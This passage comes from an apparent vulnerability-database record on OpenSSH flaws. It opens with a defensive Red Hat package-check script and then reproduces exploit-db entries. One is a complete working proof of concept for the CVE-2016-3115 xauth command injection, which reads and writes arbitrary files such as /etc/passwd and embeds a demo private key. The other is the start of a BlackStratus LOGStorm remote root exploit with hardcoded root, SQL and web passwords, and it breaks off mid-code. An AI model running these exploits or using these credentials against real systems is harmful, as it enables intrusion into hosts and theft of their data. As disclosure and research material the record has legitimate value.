sshd daemon did not check the list of\nkeyboard-interactive authentication methods for duplicates. A remote\nattacker could use this flaw to bypass the MaxAuthTries limit, making it\neasier to perform password guessing attacks. 
(CVE-2015-5600)\n\nAll openssh users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing this\nupdate, the OpenSSH server daemon (sshd) will be restarted automatically.\");\n script_tag(name:\"affected\", value:\"openssh on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2016:0466-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2016-March/msg00053.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssh\", rpm:\"openssh~5.3p1~114.el6_7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-askpass\", rpm:\"openssh-askpass~5.3p1~114.el6_7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-clients\", rpm:\"openssh-clients~5.3p1~114.el6_7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-debuginfo\", rpm:\"openssh-debuginfo~5.3p1~114.el6_7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-server\", rpm:\"openssh-server~5.3p1~114.el6_7\", rls:\"RHENT_6\")) 
!= NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:C"}}], "exploitdb": [{"lastseen": "2016-03-17T21:10:22", "description": "OpenSSH 7.2p1 - xauth Injection. CVE-2016-3115. Remote exploits for multiple platform", "published": "2016-03-16T00:00:00", "type": "exploitdb", "title": "OpenSSH <= 7.2p1 - xauth Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3115"], "modified": "2016-03-16T00:00:00", "id": "EDB-ID:39569", "href": "https://www.exploit-db.com/exploits/39569/", "sourceData": "'''\r\nAuthor: <github.com/tintinweb>\r\nRef: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115\r\nVersion: 0.2\r\nDate: Mar 3rd, 2016\r\n\r\nTag: openssh xauth command injection may lead to forced-command and /bin/false bypass\r\n\r\nOverview\r\n--------\r\n\r\nName: openssh\r\nVendor: OpenBSD\r\nReferences: * http://www.openssh.com/[1]\r\n\r\nVersion: 7.2p1 [2]\r\nLatest Version: 7.2p1\r\nOther Versions: <= 7.2p1 (all versions; dating back ~20 years)\r\nPlatform(s): linux\r\nTechnology: c\r\n\r\nVuln Classes: CWE-93 - Improper Neutralization of CRLF Sequences ('CRLF Injection')\r\nOrigin: remote\r\nMin. Privs.: post auth\r\n\r\nCVE: CVE-2016-3115\r\n\r\n\r\n\r\nDescription\r\n---------\r\n\r\nquote website [1]\r\n\r\n> OpenSSH is the premier connectivity tool for remote login with the SSH protocol. It encrypts all traffic to eliminate eavesdropping, connection hijacking, and other attacks. In addition, OpenSSH provides a large suite of secure tunneling capabilities, several authentication methods, and sophisticated configuration options.\r\nSummary\r\n-------\r\n\r\nAn authenticated user may inject arbitrary xauth commands by sending an\r\nx11 channel request that includes a newline character in the x11 cookie.\r\nThe newline acts as a command separator to the xauth binary. This attack requires\r\nthe server to have 'X11Forwarding yes' enabled. 
Disabling it, mitigates this vector.\r\n\r\nBy injecting xauth commands one gains limited* read/write arbitrary files,\r\ninformation leakage or xauth-connect capabilities. These capabilities can be\r\nleveraged by an authenticated restricted user - e.g. one with the login shell\r\nconfigured as /bin/false or one with configured forced-commands - to bypass\r\naccount restriction. This is generally not expected.\r\n\r\nThe injected xauth commands are performed with the effective permissions of the\r\nlogged in user as the sshd already dropped its privileges.\r\n\r\nQuick-Info:\r\n\r\n* requires: X11Forwarding yes\r\n* bypasses /bin/false and forced-commands\r\n** OpenSSH does not treat /bin/false like /bin/nologin (in contrast to Dropbear)\r\n* does not bypass /bin/nologin (as there is special treatment for this)\r\n\r\nCapabilities (xauth):\r\n\r\n* Xauth\r\n\t* write file: limited chars, xauthdb format\r\n\t* read file: limit lines cut at first \\s\r\n\t* infoleak: environment\r\n\t* connect to other devices (may allow port probing)\r\n\r\n\r\nPoC see ref github.\r\nPatch see ref github.\r\n\r\n\r\nDetails\r\n-------\r\n\r\n// see annotated code below\r\n\r\n * server_input_channel_req (serverloop.c)\r\n *- session_input_channel_req:2299 (session.c [2])\r\n *- session_x11_req:2181\r\n\r\n * do_exec_pty or do_exec_no_pty\r\n *- do_child\r\n *- do_rc_files (session.c:1335 [2])\r\n\r\nUpon receiving an `x11-req` type channel request sshd parses the channel request\r\nparameters `auth_proto` and `auth_data` from the client ssh packet where\r\n`auth_proto` contains the x11 authentication method used (e.g. `MIT-MAGIC-COOKIE-1`)\r\nand `auth_data` contains the actual x11 auth cookie. This information is stored\r\nin a session specific datastore. When calling `execute` on that session, sshd will\r\ncall `do_rc_files` which tries to figure out if this is an x11 call by evaluating\r\nif `auth_proto` and `auth_data` (and `display`) are set. 
If that is the case AND\r\nthere is no system `/sshrc` existent on the server AND it no user-specific `$HOME/.ssh/rc`\r\nis set, then `do_rc_files` will run `xauth -q -` and pass commands via `stdin`.\r\nNote that `auth_data` nor `auth_proto` was sanitized or validated, it just contains\r\nuser-tainted data. Since `xauth` commands are passed via `stdin` and `\\n` is a\r\ncommand-separator to the `xauth` binary, this allows a client to inject arbitrary\r\n`xauth` commands.\r\n\r\nSidenote #1: in case sshd takes the `$HOME/.ssh/rc` branch, it will pass the tainted\r\ninput as arguments to that script.\r\nSidenote #2: client code also seems to not sanitize `auth_data`, `auth_proto`. [3]\r\n\r\nThis is an excerpt of the `man xauth` [4] to outline the capabilities of this xauth\r\ncommand injection:\r\n\r\n\tSYNOPSIS\r\n \txauth [ -f authfile ] [ -vqibn ] [ command arg ... ]\r\n\r\n\t\tadd displayname protocolname hexkey\r\n\t\tgenerate displayname protocolname [trusted|untrusted] [timeout seconds] [group group-id] [data hexdata]\r\n\t\t[n]extract filename displayname...\r\n\t\t[n]list [displayname...]\r\n\t\t[n]merge [filename...]\r\n\t\tremove displayname...\r\n\t\tsource filename\r\n\t\tinfo\r\n\t\texit\r\n\t\tquit\r\n\t\tversion\r\n\t\thelp\r\n\t\t?\r\n\t\t\r\nInteresting commands are:\r\n\t\r\n\tinfo\t - leaks environment information / path\r\n\t\t\t~# xauth info\r\n\t\t\txauth: file /root/.Xauthority does not exist\r\n\t\t\tAuthority file: /root/.Xauthority\r\n\t\t\tFile new: yes\r\n\t\t\tFile locked: no\r\n\t\t\tNumber of entries: 0\r\n\t\t\tChanges honored: yes\r\n\t\t\tChanges made: no\r\n\t\t\tCurrent input: (argv):1\r\n\t\r\n\tsource\t - arbitrary file read (cut on first `\\s`)\r\n\t\t\t# xauth source /etc/shadow\r\n\t\t\txauth: file /root/.Xauthority does not exist\r\n\t\t\txauth: /etc/shadow:1: unknown command \"smithj:Ep6mckrOLChF.:10063:0:99999:7:::\"\r\n\t\t\t\t\t\t\r\n\textract - arbitrary file write\r\n\t\t\t * limited characters\r\n\t * in xauth.db 
format\r\n\t * since it is not compressed it can be combined with `xauth add` to\r\n\t first store data in the database and then export it to an arbitrary\r\n\t location e.g. to plant a shell or do other things.\r\n\t\r\n\tgenerate - connect to <ip>:<port> (port probing, connect back and pot. exploit\r\n\t\t\t vulnerabilities in X.org\r\n\t\r\n\t\r\nSource\r\n------\r\n\r\nInline annotations are prefixed with `//#!`\r\n\r\n\r\n/*\r\n * Run $HOME/.ssh/rc, /etc/ssh/sshrc, or xauth (whichever is found\r\n * first in this order).\r\n */\r\nstatic void\r\ndo_rc_files(Session *s, const char *shell)\r\n{\r\n...\r\n\t\tsnprintf(cmd, sizeof cmd, \"%s -q -\",\t\t\t\t\r\n\t\t options.xauth_location);\r\n\t\tf = popen(cmd, \"w\");\t\t\t\t\t\t\t//#! run xauth -q -\r\n\t\tif (f) {\r\n\t\t\tfprintf(f, \"remove %s\\n\",\t\t\t\t\t//#! remove <user_tainted_data> - injecting \\n auth_display injects xauth command\r\n\t\t\t s->auth_display);\r\n\t\t\tfprintf(f, \"add %s %s %s\\n\",\t\t\t\t//#! \\n injection\r\n\t\t\t s->auth_display, s->auth_proto,\r\n\t\t\t s->auth_data);\r\n\t\t\tpclose(f);\r\n\t\t} else {\r\n\t\t\tfprintf(stderr, \"Could not run %s\\n\",\r\n\t\t\t cmd);\r\n\t\t}\r\n\t}\r\n}\r\n\r\nProof of Concept\r\n----------------\r\n\r\nPrerequisites:\r\n\r\n* install python 2.7.x\r\n* issue `#> pip install paramiko` to install `paramiko` ssh library for python 2.x\r\n* make sure `poc.py`\r\n\r\n\r\n Usage: <host> <port> <username> <password or path_to_privkey>\r\n\r\n path_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key\r\n\r\n\r\npoc:\r\n\r\n1. 
configure one user (user1) for `force-commands` and another one with `/bin/false` in `/etc/passwd`:\r\n\r\n#PUBKEY line - force commands: only allow \"whoami\"\r\n#cat /home/user1/.ssh/authorized_keys\r\ncommand=\"whoami\" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user1@box\r\n\r\n#cat /etc/passwd\r\nuser2:x:1001:1002:,,,:/home/user2:/bin/false\r\n\t\r\n2. run sshd with `X11Forwarding yes` (kali default config)\r\n\r\n#> /root/openssh-7.2p1/sshd -p 22 -f sshd_config -D -d\r\n\r\n3. `forced-commands` - connect with user1 and display env information\r\n\r\n#> python <host> 22 user1 .demoprivkey\r\n\r\nINFO:__main__:add this line to your authorized_keys file:\r\n#PUBKEY line - force commands: only allow \"whoami\"\r\n#cat /home/user/.ssh/authorized_keys\r\ncommand=\"whoami\" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box\r\n\r\nINFO:__main__:connecting to: user1:<PKEY>@host:22\r\nINFO:__main__:connected!\r\nINFO:__main__:\r\nAvailable commands:\r\n .info\r\n .readfile <path>\r\n .writefile <path> <data>\r\n .exit .quit\r\n <any xauth command or type help>\r\n\r\n#> .info\r\nDEBUG:__main__:auth_cookie: '\\ninfo'\r\nDEBUG:__main__:dummy exec returned: None\r\nINFO:__main__:Authority file: /home/user1/.Xauthority\r\nFile new: no\r\nFile locked: no\r\nNumber of entries: 1\r\nChanges honored: 
yes\r\nChanges made: no\r\nCurrent input: (stdin):3\r\n/usr/bin/xauth: (stdin):2: bad \"add\" command line\r\n...\r\n\t\t\r\n4. `forced-commands` - read `/etc/passwd`\r\n\r\n...\r\n#> .readfile /etc/passwd\r\nDEBUG:__main__:auth_cookie: 'xxxx\\nsource /etc/passwd\\n'\r\nDEBUG:__main__:dummy exec returned: None\r\nINFO:__main__:root:x:0:0:root:/root:/bin/bash\r\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\r\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\r\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\r\nsync:x:4:65534:sync:/bin:/bin/sync\r\n...\r\n\r\n5. `forced-commands` - write `/tmp/testfile`\r\n\r\n#> .writefile /tmp/testfile `thisisatestfile`\r\nDEBUG:__main__:auth_cookie: '\\nadd 127.0.0.250:65500 `thisisatestfile` aa'\r\nDEBUG:__main__:dummy exec returned: None\r\nDEBUG:__main__:auth_cookie: '\\nextract /tmp/testfile 127.0.0.250:65500'\r\nDEBUG:__main__:dummy exec returned: None\r\nDEBUG:__main__:/usr/bin/xauth: (stdin):2: bad \"add\" command line\r\n\r\n#> ls -lsat /tmp/testfile\r\n4 -rw------- 1 user1 user1 59 xx xx 13:49 /tmp/testfile\r\n\r\n#> cat /tmp/testfile\r\n\\FA65500hi\\FA65500`thisisatestfile`\\AA\r\n\r\n6. `/bin/false` - connect and read `/etc/passwd`\r\n\r\n#> python <host> 22 user2 user2password\r\nINFO:__main__:connecting to: user2:user2password@host:22\r\nINFO:__main__:connected!\r\nINFO:__main__:\r\nAvailable commands:\r\n .info\r\n .readfile <path>\r\n .writefile <path> <data>\r\n .exit .quit\r\n <any xauth command or type help>\r\n\r\n#> .readfile /etc/passwd\r\nDEBUG:__main__:auth_cookie: 'xxxx\\nsource /etc/passwd\\n'\r\nDEBUG:__main__:dummy exec returned: None\r\nINFO:__main__:root:x:0:0:root:/root:/bin/bash\r\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\r\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\r\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\r\n...\r\nuser2:x:1001:1002:,,,:/home/user2:/bin/false\r\n...\r\n\t\r\n7. 
`/bin/false` - initiate outbound X connection to 8.8.8.8:6100\r\n\r\n#> generate 8.8.8.8:100 .\t\r\n\r\n#> tcpdump\r\nIP <host>.42033 > 8.8.8.8.6100: Flags [S], seq 1026029124, win 29200, options [mss 1460,sackOK,TS val 431416709 ecr 0,nop,wscale 10], length 0\r\n\t\r\n\r\nMitigation / Workaround\r\n------------------------\r\n\r\n* disable x11-forwarding: `sshd_config` set `X11Forwarding no`\r\n* disable x11-forwarding for specific user with forced-commands: `no-x11-forwarding` in `authorized_keys`\r\n\r\nNotes\r\n-----\r\n\r\nVerified, resolved and released within a few days. very impressive.\r\n\r\nVendor response: see advisory [5]\r\n\r\nReferences\r\n----------\r\n\r\n[1] http://www.openssh.com/\r\n[2] https://github.com/openssh/openssh-portable/blob/5a0fcb77287342e2fc2ba1cee79b6af108973dc2/session.c#L1388\r\n[3] https://github.com/openssh/openssh-portable/blob/19bcf2ea2d17413f2d9730dd2a19575ff86b9b6a/clientloop.c#L376\r\n[4] http://linux.die.net/man/1/xauth\r\n[5] http://www.openssh.com/txt/x11fwd.adv\r\n'''\r\n\r\n#!/usr/bin/env python\r\n# -*- coding: UTF-8 -*-\r\n# Author : <github.com/tintinweb>\r\n###############################################################################\r\n#\r\n# FOR DEMONSTRATION PURPOSES ONLY!\r\n#\r\n###############################################################################\r\nimport logging\r\nimport StringIO\r\nimport sys\r\nimport os\r\n\r\nLOGGER = logging.getLogger(__name__)\r\ntry:\r\n import paramiko\r\nexcept ImportError, ie:\r\n logging.exception(ie)\r\n logging.warning(\"Please install python-paramiko: pip install paramiko / easy_install paramiko / <distro_pkgmgr> install python-paramiko\")\r\n sys.exit(1)\r\n\r\nclass SSHX11fwdExploit(object):\r\n def __init__(self, hostname, username, password, port=22, timeout=0.5, \r\n pkey=None, pkey_pass=None):\r\n self.ssh = paramiko.SSHClient()\r\n self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\r\n if pkey:\r\n pkey = 
paramiko.RSAKey.from_private_key(StringIO.StringIO(pkey),pkey_pass)\r\n self.ssh.connect(hostname=hostname, port=port, \r\n username=username, password=password, \r\n timeout=timeout, banner_timeout=timeout,\r\n look_for_keys=False, pkey=pkey)\r\n \r\n def exploit(self, cmd=\"xxxx\\n?\\nsource /etc/passwd\\n\"):\r\n transport = self.ssh.get_transport()\r\n session = transport.open_session()\r\n LOGGER.debug(\"auth_cookie: %s\"%repr(cmd))\r\n session.request_x11(auth_cookie=cmd)\r\n LOGGER.debug(\"dummy exec returned: %s\"%session.exec_command(\"\"))\r\n \r\n transport.accept(0.5)\r\n session.recv_exit_status() # block until exit code is ready\r\n stdout, stderr = [],[]\r\n while session.recv_ready():\r\n stdout.append(session.recv(4096))\r\n while session.recv_stderr_ready():\r\n stderr.append(session.recv_stderr(4096))\r\n session.close()\r\n return ''.join(stdout)+''.join(stderr) # catch stdout, stderr\r\n \r\n def exploit_fwd_readfile(self, path):\r\n data = self.exploit(\"xxxx\\nsource %s\\n\"%path)\r\n if \"unable to open file\" in data:\r\n raise IOError(data)\r\n ret = []\r\n for line in data.split('\\n'):\r\n st = line.split('unknown command \"',1)\r\n if len(st)==2:\r\n ret.append(st[1].strip(' \"'))\r\n return '\\n'.join(ret)\r\n \r\n def exploit_fwd_write_(self, path, data):\r\n '''\r\n adds display with protocolname containing userdata. 
badchars=<space>\r\n \r\n '''\r\n dummy_dispname = \"127.0.0.250:65500\"\r\n ret = self.exploit('\\nadd %s %s aa'%(dummy_dispname, data))\r\n if ret.count('bad \"add\" command line')>1:\r\n raise Exception(\"could not store data most likely due to bad chars (no spaces, quotes): %s\"%repr(data))\r\n LOGGER.debug(self.exploit('\\nextract %s %s'%(path,dummy_dispname)))\r\n return path\r\n \r\ndemo_authorized_keys = '''#PUBKEY line - force commands: only allow \"whoami\"\r\n#cat /home/user/.ssh/authorized_keys\r\ncommand=\"whoami\" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box\r\n''' \r\nPRIVKEY = \"\"\"-----BEGIN RSA PRIVATE KEY-----\r\nMIIEowIBAAKCAQEAtUaWCq7z5CM7wGH1/2XlNVMy7glVgYCVHjf8BUZo+FypdD69\r\n9SPu06CZ3e0vSUx5KxlQ7vgU6CtH9nQli53oMy225a/RUGEon/axzVtwTpMnVLqn\r\nPLEUn9zPaCjwwpg/Brhr5+NHc3bm/u/LHmKrEg6IjyWssE16exuhA3G/Teed+NaN\r\nzKR3jVLrmXohc9dp57jYBPLZJ5NSojsd27LjdWnq/PokxwvkQOrOPkhTne+7GRts\r\nU68nW5a99jMSb4bpgqsUsIY0IIsKc1nfzUxonvcXmh+RASIffLCzA0OdQyJ7UrPh\r\nTLw8dVOK2e9zsJYlOYUA6G3rnzq9sNmqe7XdeQIDAQABAoIBAHu5M4sTIc8h5RRH\r\nSBkKuMgOgwJISJ3c3uoDF/WZuudYhyeZ8xivb7/tK1d3HQEQOtsZqk2P8OUNNU6W\r\ns1F5cxQLLXvS5i/QQGP9ghlBQYO/l+aShrY7vnHlyYGz/68xLkMt+CgKzaeXDc4O\r\naDnS6iOm27mn4xdpqiEAGIM7TXCjcPSQ4l8YPxaj84rHBcD4w033Sdzc7i73UUne\r\neuQL7bBz5xNibOIFPY3h4q6fbw4bJtPBzAB8c7/qYhJ5P3czGxtqhSqQRogK8T6T\r\nA7fGezF90krTGOAz5zJGV+F7+q0L9pIR+uOg+OBFBBmgM5sKRNl8pyrBq/957JaA\r\nrhSB0QECgYEA1604IXr4CzAa7tKj+FqNdNJI6jEfp99EE8OIHUExTs57SaouSjhe\r\nDDpBRSTX96+EpRnUSbJFnXZn1S9cZfT8i80kSoM1xvHgjwMNqhBTo+sYWVQrfBmj\r\nbDVVbTozREaMQezgHl+Tn6G1OuDz5nEnu+7gm1Ud07BFLqi8Ssbhu2kCgYEA1yrc\r\nKPIAIVPZfALngqT6fpX6P7zHWdOO/Uw+PoDCJtI2qljpXHXrcI4ZlOjBp1fcpB
C9\r\n2Q0TNUfra8m3LGbWfqM23gTaqLmVSZSmcM8OVuKuJ38wcMcNG+7DevGYuELXbOgY\r\nnimhjY+3+SXFWIHAtkJKAwZbPO7p857nMcbBH5ECgYBnCdx9MlB6l9rmKkAoEKrw\r\nGt629A0ZmHLftlS7FUBHVCJWiTVgRBm6YcJ5FCcRsAsBDZv8MW1M0xq8IMpV83sM\r\nF0+1QYZZq4kLCfxnOTGcaF7TnoC/40fOFJThgCKqBcJQZKiWGjde1lTM8lfTyk+f\r\nW3p2+20qi1Yh+n8qgmWpsQKBgQCESNF6Su5Rjx+S4qY65/spgEOOlB1r2Gl8yTcr\r\nbjXvcCYzrN4r/kN1u6d2qXMF0zrPk4tkumkoxMK0ThvTrJYK3YWKEinsucxSpJV/\r\nnY0PVeYEWmoJrBcfKTf9ijN+dXnEdx1LgATW55kQEGy38W3tn+uo2GuXlrs3EGbL\r\nb4qkQQKBgF2XUv9umKYiwwhBPneEhTplQgDcVpWdxkO4sZdzww+y4SHifxVRzNmX\r\nAo8bTPte9nDf+PhgPiWIktaBARZVM2C2yrKHETDqCfme5WQKzC8c9vSf91DSJ4aV\r\npryt5Ae9gUOCx+d7W2EU7RIn9p6YDopZSeDuU395nxisfyR1bjlv\r\n-----END RSA PRIVATE KEY-----\"\"\"\r\n\r\n\r\nif __name__==\"__main__\":\r\n logging.basicConfig(loglevel=logging.DEBUG)\r\n LOGGER.setLevel(logging.DEBUG)\r\n \r\n if not len(sys.argv)>4:\r\n print \"\"\" Usage: <host> <port> <username> <password or path_to_privkey>\r\n \r\n path_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key\r\n \r\n\"\"\"\r\n sys.exit(1)\r\n hostname, port, username, password = sys.argv[1:]\r\n port = int(port)\r\n pkey = None\r\n if os.path.isfile(password):\r\n password = None\r\n with open(password,'r') as f:\r\n pkey = f.read()\r\n elif password==\".demoprivkey\":\r\n pkey = PRIVKEY\r\n password = None\r\n LOGGER.info(\"add this line to your authorized_keys file: \\n%s\"%demo_authorized_keys)\r\n \r\n LOGGER.info(\"connecting to: %s:%s@%s:%s\"%(username,password if not pkey else \"<PKEY>\", hostname, port))\r\n ex = SSHX11fwdExploit(hostname, port=port,\r\n username=username, password=password,\r\n pkey=pkey,\r\n timeout=10\r\n )\r\n LOGGER.info(\"connected!\")\r\n LOGGER.info (\"\"\"\r\nAvailable commands:\r\n .info\r\n .readfile <path>\r\n .writefile <path> <data>\r\n .exit .quit\r\n <any xauth command or type help>\r\n\"\"\")\r\n while True:\r\n cmd = raw_input(\"#> \").strip()\r\n if cmd.lower().startswith(\".exit\") or 
cmd.lower().startswith(\".quit\"):\r\n break\r\n elif cmd.lower().startswith(\".info\"):\r\n LOGGER.info(ex.exploit(\"\\ninfo\"))\r\n elif cmd.lower().startswith(\".readfile\"): \r\n LOGGER.info(ex.exploit_fwd_readfile(cmd.split(\" \",1)[1]))\r\n elif cmd.lower().startswith(\".writefile\"):\r\n parts = cmd.split(\" \")\r\n LOGGER.info(ex.exploit_fwd_write_(parts[1],' '.join(parts[2:])))\r\n else:\r\n LOGGER.info(ex.exploit('\\n%s'%cmd))\r\n \r\n # just playing around \r\n #print ex.exploit_fwd_readfile(\"/etc/passwd\")\r\n #print ex.exploit(\"\\ninfo\")\r\n #print ex.exploit(\"\\ngenerate <ip>:600<port> .\") # generate <ip>:port port=port+6000\r\n #print ex.exploit(\"\\nlist\")\r\n #print ex.exploit(\"\\nnlist\")\r\n #print ex.exploit('\\nadd xx xx \"\\n')\r\n #print ex.exploit('\\ngenerate :0 . data \"')\r\n #print ex.exploit('\\n?\\n')\r\n #print ex.exploit_fwd_readfile(\"/etc/passwd\")\r\n #print ex.exploit_fwd_write_(\"/tmp/somefile\", data=\"`whoami`\")\r\n LOGGER.info(\"--quit--\")\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/39569/"}, {"lastseen": "2016-12-04T21:23:14", "description": "BlackStratus LOGStorm 4.5.1.35/4.5.1.96 - Remote Root Exploit. 
Remote exploit for Hardware platform", "published": "2016-12-04T00:00:00", "type": "exploitdb", "title": "BlackStratus LOGStorm 4.5.1.35/4.5.1.96 - Remote Root Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3115"], "modified": "2016-12-04T00:00:00", "id": "EDB-ID:40858", "href": "https://www.exploit-db.com/exploits/40858/", "sourceData": "#!/usr/bin/python\r\n# logstorm-root.py\r\n#\r\n# BlackStratus LOGStorm Remote Root Exploit\r\n#\r\n# Jeremy Brown [jbrown3264/gmail]\r\n# Dec 2016\r\n#\r\n# -Synopsis-\r\n#\r\n# \"Better Security and Compliance for Any Size Business\"\r\n#\r\n# BlackStratus LOGStorm has multiple vulnerabilities that allow a remote unauthenticated user, among\r\n# other things, to assume complete control over the virtual appliance with root privileges. This is\r\n# possible due to multiple network servers listening for network connections by default, allowing\r\n# authorization with undocumented credentials supported by appliance's OS, web interface and sql server.\r\n#\r\n# -Tested-\r\n#\r\n# v4.5.1.35\r\n# v4.5.1.96\r\n#\r\n# -Usage-\r\n#\r\n# Dependencies: pip install paramiko MySQL-python\r\n#\r\n# There are (5) actions provided in this script: root, reset, sql, web and scan.\r\n#\r\n# [root] utilizes bug #1 to ssh login to a given <host> as root and run the 'id' command\r\n# [reset] utilizes bug #2 to ssh login to a given <host> as privileged htinit user and resets the root password\r\n# [sql*] utilizes bug #3 to sql login to a given <host> as privileged htr user and retrieve web portal credentials\r\n# [web] utilizes bug #4 to http login to a given <host> as hardcoded webserveruser (presumably) admin account\r\n# [scan] scans a given <host>/24 for potentially vulnerable appliances\r\n#\r\n# *sql only works remotely before license validation as afterwards sql server gets firewalled, becoming local only.\r\n#\r\n# Note: this exploit is not and cannot be weaponized simply because exploits are not weapons.\r\n#\r\n# 
-Fixes-\r\n#\r\n# BlackStratus did not coherently respond to product security inquiries, so there's no official fix. But\r\n# customers may (now) root the appliance themselves to change the passwords, disable root login, firewall\r\n# network services or remove additional user accounts to mitigate these vulnerabilities.. or choose another\r\n# product altogether because this appliance, as of today, simply adds too much attack surface to the network.\r\n#\r\n# -Bonuses-\r\n#\r\n# 1) Another account's (htftp/htftp) shell is set to /bin/false, which affords at least a couple attacks\r\n# \r\n# 1.1) The appliance is vulnerable to CVE-2016-3115, which we can use to read/write to arbitrary files\r\n# 1.2) We can use the login to do port forwarding and hit local services, such as the Java instance running\r\n# in debug mode and probably exploitable with jdwp-shellifer.py (also netcat with -e is installed by default!)\r\n#\r\n# 2) More sql accounts: htm/htm_pwd and tvs/tvs_pwd\r\n#\r\n\r\nimport sys\r\nimport socket\r\nimport time\r\nfrom paramiko import ssh_exception\r\nimport paramiko\r\nimport MySQLdb\r\nimport httplib\r\nimport urllib\r\n\r\nSSH_BANNER = \"_/_/_/_/\"\r\nSSH_PORT = 22\r\nMYSQL_PORT = 3306\r\nMYSQL_DB = \"htr\"\r\nMYSQL_CMD = \"select USER_ID,hex(MD5_PASSWORD) from users;\"\r\nWEB_URL = \"/tvs/layout/j_security_check\"\r\n\r\nROOT_CREDS = [\"root\", \"3!acK5tratu5\"]\r\nHTINIT_CREDS = [\"htinit\", \"htinit\"]\r\nMYSQL_CREDS = [\"htr\", \"htr_pwd\"]\r\nWEB_CREDS = [\"webserviceuser\", \"donotChangeOnInstall\"]\r\n\r\n\r\ndef main():\r\n if(len(sys.argv) < 2):\r\n print(\"Usage: %s <action> <host>\" % sys.argv[0])\r\n print(\"Eg. 
